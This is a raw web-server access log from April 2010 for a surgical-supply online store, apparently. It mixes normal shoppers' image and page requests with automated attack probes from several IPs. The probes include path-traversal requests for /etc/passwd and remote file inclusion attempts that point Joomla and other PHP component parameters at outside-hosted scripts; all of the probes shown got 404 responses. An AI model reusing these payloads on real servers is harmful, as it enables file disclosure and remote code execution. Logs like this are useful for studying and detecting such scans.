66.118.176.82 - - [16/Apr/2010:00:48:03 -0400] "GET /logs//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
99.198.109.18 - - [16/Apr/2010:00:48:03 -0400] "GET /logs/error_log.Q109100100//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
66.118.176.82 - - [16/Apr/2010:00:48:47 -0400] "GET /logs/error_log.Q109100100//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
174.121.24.1 - - [16/Apr/2010:00:49:23 -0400] "GET /logs/access_log.Q110012800%20%20//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:49:40 -0400] "GET /logs/access_log.Q110031400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:00:49:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA2334D5033B638005F0309Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [16/Apr/2010:00:50:13 -0400] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:50:13 -0400] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:50:13 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
110.45.147.226 - - [16/Apr/2010:00:50:32 -0400] "GET /logs/access_log.Q109052200//modules/xfsection/modify.php?dir_module=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:00:50:47 -0400] "GET /logs/access_log.Q109112600//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
94.247.178.106 - - [16/Apr/2010:00:50:47 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
94.247.178.106 - - [16/Apr/2010:00:50:47 -0400] "GET /logs//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
110.45.147.226 - - [16/Apr/2010:00:50:50 -0400] "GET /logs/access_log.Q110032400//modules/xfsection/modify.php?dir_module=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:50:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:50:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /logs/access_log.Q110011600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /logs/access_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /logs/error_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /logs/error_log.Q110011600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:50:57 -0400] "GET /logs/access_log.Q109101600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
74.14.231.236 - - [16/Apr/2010:00:50:58 -0400] "GET //index.php?pg=./../../../../../../../../etc/passwd%00 HTTP/1.0" 404 208 "-" "-"
74.14.231.236 - - [16/Apr/2010:00:51:01 -0400] "GET //index.php?pg=./../../../../../../../../etc/passwd HTTP/1.0" 404 208 "-" "-"
79.98.23.9 - - [16/Apr/2010:00:51:01 -0400] "GET /logs/error_log.Q109101600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:01 -0400] "GET /logs/access_log.Q109071700/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:01 -0400] "GET /logs/error_log.Q109071700/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:01 -0400] "GET /logs/access_log.Q109091400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.82.245.162 - - [16/Apr/2010:00:51:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
68.82.245.162 - - [16/Apr/2010:00:51:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
139.168.143.136 - - [16/Apr/2010:00:51:06 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76932 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:07 -0400] "GET /logs/error_log.Q109091400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:08 -0400] "GET /logs/error_log.Q110010800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:08 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:09 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:09 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:09 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:09 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:10 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:10 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:11 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:11 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:11 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:12 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:12 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:12 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:12 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:13 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:13 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:14 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:14 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:14 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:14 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:15 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:15 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:15 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:15 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:16 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:16 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:16 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:18 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:18 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:18 -0400] "GET /logs/access_log.Q109103100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:18 -0400] "GET /logs/error_log.Q109103100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:19 -0400] "GET /logs/error_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:19 -0400] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:19 -0400] "GET /logs/access_log.Q110011600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:19 -0400] "GET /logs/error_log.Q110011600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:19 -0400] "GET /logs/access_log.Q109101600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:24 -0400] "GET /logs/error_log.Q109101600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:24 -0400] "GET /logs/access_log.Q109071700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:26 -0400] "GET /logs/access_log.Q109110100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:27 -0400] "GET /logs/error_log.Q109110100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:27 -0400] "GET /logs/error_log.Q109062200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:00:51:29 -0400] "GET /logs/error_log.Q109100100//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
79.98.23.9 - - [16/Apr/2010:00:51:29 -0400] "GET /logs/error_log.Q109071700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:29 -0400] "GET /logs/access_log.Q109091400%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L4274EC569689300067C707P+M37+ENG HTTP/1.1" 200 38046 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:30 -0400] "GET /logs/error_log.Q109091400%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:36 -0400] "GET /logs/error_log.Q110010800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:36 -0400] "GET /logs/access_log.Q109071900%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:44 -0400] "GET /logs/error_log.Q109103100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG HTTP/1.1" 200 37804 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC569689300067C707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:48 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:48 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:50 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:50 -0400] "GET /logs/access_log.Q109110100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
